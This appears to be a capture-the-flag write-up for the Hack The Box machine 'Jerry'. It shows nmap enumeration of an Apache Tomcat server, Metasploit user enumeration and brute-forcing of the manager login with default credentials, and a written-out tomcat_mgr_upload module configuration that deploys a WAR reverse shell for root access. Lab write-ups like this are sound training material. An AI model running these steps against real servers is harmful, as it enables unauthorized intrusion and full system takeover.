# Jerry
>##  10.10.10.95

nmap
>PORT     STATE SERVICE VERSION
[8080/tcp](portscan.md#8080) open  http    [Apache Tomcat](tomcat)/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

The only open port is the 8080 hosting a tomcat proxy
![[jerry1.png]]

doing some basic webenumeration 
![[jerry8.png]]
we can easily spot a "host-manager" webpage, checking it out will lead us to a login form but using the default creds we're not able to login.
Using the tomcat enumerator provided by msf
>use scanner/http/tomcat_enum

we'll be able to collect the list of the users:
```
admin
both
manager
role1
root
tomcat
```
using the bruteforce login module
>use auxiliary/scanner/http/tomcat_mgr_login

with the tomcat default password wordlist this is what the output should look like:
![[jerry3.png]]
But as you can see there's a combination that works and it's the default creds combination so what was the problem?
A quick check with 
>options

![[jerry5.png]]
will tell us that the path bruteforced with this module is /manager/html and not /host-manager/html.
We were in the wrong place.
Using the default creds in the RIGHT place - http://10.10.10.95:8080/manager/html - will be prompted this page
![[jerry4.png]]

As you can see we can upload a .war file, msf have a module to upload and deploy a .war shell on tomcat if you have the right creds 
![[jerry6.png]]
> use multi/http/tomcat_mgr_upload
set httpPassword s3cret
set httpusername tomcat
set rhost 10.10.10.95
set rport 8080
set lhost tun0
exploit

and we're in
![[jerry7.png]]

We're root.

#machine #tomcat #msf 